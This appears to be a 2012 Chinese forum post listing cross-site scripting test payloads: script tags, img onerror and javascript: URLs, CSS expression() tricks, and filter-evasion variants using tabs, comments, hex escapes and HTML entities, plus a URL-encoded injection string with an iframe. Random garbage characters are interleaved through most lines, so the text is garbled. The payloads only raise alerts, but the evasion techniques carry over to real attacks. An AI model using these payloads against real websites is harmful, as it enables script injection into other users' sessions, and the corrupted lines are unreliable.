<script>alert("跨站")</script> (最常用)7 K7 }$ b+ r! f1 Y# b
<img scr=javascript:alert("跨站")></img>! Y3 T J. q. ~9 q% O2 o# d
<img scr="javascript: alert(/跨站/)></img>
7 K# ^0 {/ x( g% h/ T5 T<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
. u1 s. `( e" U& c# T8 L/ S<img scr="#" onerror=alert(/跨站/)></img>
6 Y# V' M4 D2 V: i1 ]! O<img scr="#" style="xss:expression(alert(/xss/));"></img>
& Q3 m# h# @+ y; q+ u# s<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
+ V! p% i( E/ F/ L( x5 ^4 g<img src=vbscript:msgbox ("xss")></img>% z% k7 S+ J$ ?$ \; Q! j+ X W
<style> input {left:expression (alert('xss'))}</style>
6 d+ E! ]/ q9 X<div style={left:expression (alert('xss'))}></div>
. {% q3 {& ]) E3 ^! j8 r ~<div style={left:exp/* */ression (alert('xss'))}></div>/ C' X' S$ j. [$ h* {
<div style={left:\0065\0078ression (alert('xss'))}></div>
! }! q7 x) H- k; j6 M( |html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
\" w6 M/ I( E4 ~) A0 f6 dunicode <div style="{left:expRessioN (alert('xss'))}">
; c" i( k' _% L$ H0 f0 ^: c6 d
8 R1 C; F' |$ ^"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
3 Q9 P; a' Q9 r; D1 V! g0 B |
发表于 2012-9-15 14:09:13
收藏
支持
反对